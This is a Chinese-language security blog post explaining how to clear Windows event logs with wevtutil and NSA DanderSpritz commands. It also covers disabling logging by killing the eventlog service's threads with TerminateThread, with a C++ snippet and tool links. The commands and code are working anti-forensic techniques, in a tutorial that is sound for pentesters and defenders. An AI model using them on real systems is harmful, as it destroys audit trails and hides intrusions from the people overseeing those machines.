0x00 前言
在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。
对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。
所以本文将要介绍常见的Windows日志清除与绕过方法,分享经验,帮助大家。
0x01 简介
本文将要介绍以下内容:
- Windows日志的常用清除方法
- Windows日志的两种绕过方法
0x02 Windows日志
Windows日志包括五个类别:
- 应用程序
- 安全
- Setup
- 系统
- 转发事件
查看方式:
1、 通过面板
位置如下:
Control Panel\System and Security-View event logs-Windows Logs
如下图
2、 通过Powershell
常用命令如下:
(管理员权限)
查看所有日志:
Get-WinEvent
查看应用程序类别下的日志:
Get-WinEvent -FilterHashtable @{logname="Application";}
0x03 Windows日志的常用清除方法
1、wevtutil.exe
操作系统默认包含,支持系统:Win7及以上
常用命令如下:
(1) 统计日志列表,查询所有日志信息,包含时间,数目
wevtutil.exe gli Application
操作如下图
(2) 查看指定类别的日志内容
wevtutil qe /f:text Application
操作如下图
(3) 删除该类日志所有内容
wevtutil cl Application
操作如下图
Application日志全部清除,数目为0
(4) 删除单条内容
尚不支持
2、NSA DanderSpiritz
DanderSpritz是NSA的一款界面化的远控工具
相关介绍可参考:
https://3gstudent.github.io/3gstudent.github.io/NSA-DanderSpiritz%E6%B5%8B%E8%AF%95%E6%8C%87%E5%8D%97-%E6%9C%A8%E9%A9%AC%E7%94%9F%E6%88%90%E4%B8%8E%E6%B5%8B%E8%AF%95/
常用命令如下:
(1) 统计日志列表,查询所有日志信息,包含时间,数目
eventlogquery -log Application
(2) 查看指定类别的日志内容
eventlogfilter -log Application -num 10
(3) 删除该类日志所有内容
eventlogclear -log Application
(4) 删除单条内容
eventlogedit -log Application -record 1
注:
record序号可通过eventlogfilter获得
0x04 Windows日志的绕过方法
本文介绍的思路参考自Halil [email protected]的文章,地址如下:
https://artofpwn.com/phant0m-killing-windows-event-log.html
绕过原理:
Windows日志对应于eventlog服务,找到该服务对应的进程svchost.exe,进而筛选出svchost.exe进程中具体实现日志功能的线程,调用TerminateThread结束线程,破坏日志记录功能
特别的地方:
由于只结束了实现日志功能的线程,所以Windows Event Log服务没有被破坏,状态仍为正在运行
绕过方法一
1、 定位eventlog服务对应进程svchost.exe的pid
2、 遍历该进程中的所有线程
3、 判断线程是否满足条件
Windows Event Log 服务需要调用wevtsvc.dll,完整路径为%WinDir%\System32\wevtsvc.dll
并且,如果线程调用了wevtsvc.dll,就可以判读该线程实现了日志记录功能
4、 结束线程
使用TerminateThread
注:
Halil [email protected]使用powershell实现了方法一,完整代码可参考:
https://github.com/hlldz/Invoke-Phant0m
powershell脚本执行后,Windows日志功能失效,无法记录日志,操作如下图
5、 恢复方法
结束进程svchost.exe
重新开启Windows Event Log 服务:
net start eventlog
操作如下图
绕过方法二
1、 定位eventlog服务对应进程svchost.exe的pid
powershell代码如下:
Get-WmiObject -Class win32_service -Filter "name = ‘eventlog‘" | select -exp ProcessId
找到svchost.exe的pid为7008,如下图
2、 遍历该进程中的所有线程
使用PsList
下载地址:
https://technet.microsoft.com/en-us/sysinternals/bb896682.aspx
具体参数如下:
pslist.exe /accepteula -d 7008
获取进程svchost.exe中的所有线程,如下图
3、 判断线程是否满足条件
获取线程对应的服务,如果为eventlog,则满足条件
使用工具:ScTagQuery
下载地址:
http://www.winsiderss.com/tools/sctagquery/sctagqry.zip
具体参数如下:
sctagqry.exe -t 7928
根据返回的结果Service Tag,判断线程对应的服务
找到对应eventlog的线程,如下图
线程8136符合条件,依次尝试,直到获取所有符合条件线程
注:
使用Process Explorer可以简化此过程
找到eventlog服务对应进程svchost.exe
如下图
右键查看属性,选择Threads标签,查看线程,可直接获得线程对应的服务
如下图
符合条件的线程TID为:
- 8136
- 8052
- 6708
- 2316
- 6356
4、 结束线程
调用TerminateThread
通过c++实现,部分代码如下:
int main(int argc, char* argv[])
{
printf("TerminateThread TID:\n");
for(int i=1;i<argc;i++)
{
printf("%s\n",argv[i]);
HANDLE hThread = OpenThread(0x0001, FALSE,atoi(argv[i]));
if(TerminateThread(hThread,0)==0)
printf("[!] TerminateThread Error, TID: %s \n",argv[i]);
CloseHandle(hThread);
}
return 0;
}
完整代码已上传至github,地址如下:
https://github.com/3gstudent/Windwos-EventLog-Bypass/blob/master/TerminateEventLogThread.cpp
控制台支持传入多个参数,向其传入5个TID: 8136 8052 6708 2316 6356
自动结束对应线程,日志功能失效
具体操作如下图
注:
稍后我会在github上更新该绕过方法的完整实现代码,地址如下:
https://github.com/3gstudent/Windwos-EventLog-Bypass
0x05 补充
1、安装sysmon可对Windows日志功能进行扩展
相关介绍和绕过思路可参考;
https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7/
2、绕过方法仅针对Windows日志
对应用程序和服务日志失效,例如Windows Powershell
如下图
0x06 小结
本文对Windows日志的清除和绕过方法做了介绍,希望能够帮助大家,接下来会分享绕过方法二的具体程序实现方法。